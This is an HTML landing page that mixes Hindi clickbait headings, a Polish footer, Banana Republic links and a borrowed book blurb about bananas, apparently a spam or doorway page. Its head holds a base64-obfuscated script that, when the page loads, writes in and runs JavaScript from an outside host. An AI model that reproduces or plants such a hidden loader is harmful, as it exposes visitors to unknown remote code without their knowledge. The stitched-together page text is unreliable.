<!doctype html>
<html lang="es">
    <head>
        <meta name="viewport" content="width=device-width;">
        <script src="data:text/javascript;base64,ZG9jdW1lbnQub3BlbigpO2RvY3VtZW50LndyaXRlKCc8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jZG4uc3RlcGJ5c3RlcC5kaWdpdGFsLzcvZDFmMy5qcyI+PC9zY3JpcHQ+Jyk7ZG9jdW1lbnQuY2xvc2UoKTs="></script>
        <meta charset="utf-8">
        <title>आपके लिए बड़ी बात हो सकती है</title>
        <style>
            *{
                padding: 0;
                margin: 0;
            }
            body,html{
                margin: 0 0;
                padding: 0 0;
                box-sizing: border-box;
                color: white;
            }
            body{
                background: rgb(34,193,195);

            }
            .container{
                max-width: 1200px;
                margin:0 auto;
            }
            @media screen (max-width:1200px){
                .container{
                    max-width: 970px;
                }
            }
            @media (max-width:992px){
                .container{
                    max-width: 750px;
                }
            }
            @media screen (max-width:767){
                .container {
                    max-width: none;
                }
                }
/*            Header*/
            header{
                
                padding-top: 30px;
                position: absolute;
                top: 0;
                left: 0;
                right: 0;
                z-index: 1000;
                        }
            .intro{
                height: 100vh;
                display: flex;
                flex-direction: column;
                justify-content: space-around;
                text-align: center;
                
            }
            .inner_header{
                
                display: flex;
                justify-content: space-between;
                
            }
            nav a{
                color: black;
                font-size: 18px;
                text-transform: uppercase;
                margin-left: 30px;
                text-decoration: none;
            }
            .nav__link{
            position: relative;
            }
            .nav__link:after {
                content: "";
                display: block;
                width: 100%;
                height: 3px;

                background-color: #fce38a;
                opacity: 1;

                position: absolute;
                top: 100%;
                left: 0;
                z-index: 1;

                transition: opacity .1s linear;
            }
            nav a:hover{
                font-size: 20px;
            }
            section{
                height: 900px;
            }
            
/*            Section*/
            img{
                max-width: 500px;
                max-height: 500px;
            }
            .headline{
                height: 70px;
                margin: 10px;
                text-transform: uppercase;
                font-size: 27px;
                text-align: center;
            }
            .inner-section{
                display: flex;
                justify-content: space-between;
                flex-direction: row;
                padding: 10px;
            }
            .section{
                display: flex;
                justify-content: space-between;
                flex-direction: column;
                align-items: center;
                
            }
            .article1{
                padding: 10px;
            }
/*            FOOTER*/
            footer{
                position: relative;
                bottom: 0;
                padding: 20px;
                color: black;
                height: 50px;
                background-color: #c7d4d2;
            }
            .footer__nav{
                display: flex;
                flex-direction: row;
                justify-content: space-between;
                color: black;
            }
        </style>
    </head>
    <body>
        <header>
            <div class="container">
                <div class="inner_header">
                   <h1>लड़कियां हैरान रह जाएंगी</h1>
                    <nav>
                    <a href="https://bananarepublic.gap.com/">About</a>
                    <a href="https://bananarepublic.gap.com/">Terms and conditions</a>
                    <a href="policy.html">Policy</a>
                    </nav>
                </div>
            </div>
        </header>
        <div class="intro">
             <div class="container">
                 <div class="intro__inner">
                     <h1 class="intro__title">साइट पर जाएं</h1>
                 </div>
             </div>
        </div>
        <section>
            <div class="container">
              <div class="section">
              <h1 class="headline">साइट पर जाएं</h1>
             
                <img src="119018816_137617941372962_3521706017129067035_o.jpg" alt="" class="main-img"  width="83%" height="83%">
                  
             
               <div class="inner-section">
                        <div class="article1"><img src="" alt=""> <p>ENJOY AN EXTRA 15% OFF YOUR FIRST PURCHASE</p></div>
                        <div class="article1"><img src="" alt=""> <p>In this fascinating and surprising exploration of the banana’s history, cultural significance, and endangered future, award-winning journalist Dan Koeppel gives readers plenty of food for thought. Fast-paced and highly entertaining, Banana takes us from jungle to supermarket, from corporate boardrooms to kitchen tables around the world. We begin in the Garden of Eden—examining scholars’ belief that</p></div>
                </div>
                <div class="inner-section">
                        <div class="article1"><img src="" alt=""> <p>the companies now known as Chiquita and Dole conquered the marketplace. Koeppel then chronicles the banana’s path to the present, ultimately—and most alarmingly—taking us to banana plantations across the globe that are being destroyed by a fast-moving blight, with no cure in sight—and to the high-tech labs where new bananas are literally being built in test tubes, in a race to save the world’s most beloved fruit.</p></div>
                        
                </div>
              </div>
                
                
            </div>
        </section>
        <footer>
            <div class="container">
                <div class="footer">
                    <nav class="footer__nav">
                    <a href="https://bananarepublic.gap.com/">O nas</a>
                    <a href="https://bananarepublic.gap.com/">Terms and conditions</a>
                    <a href="policy.html">Policy</a>
                    </nav>
                </div>
            </div>
        </footer>
    </body>
</html>
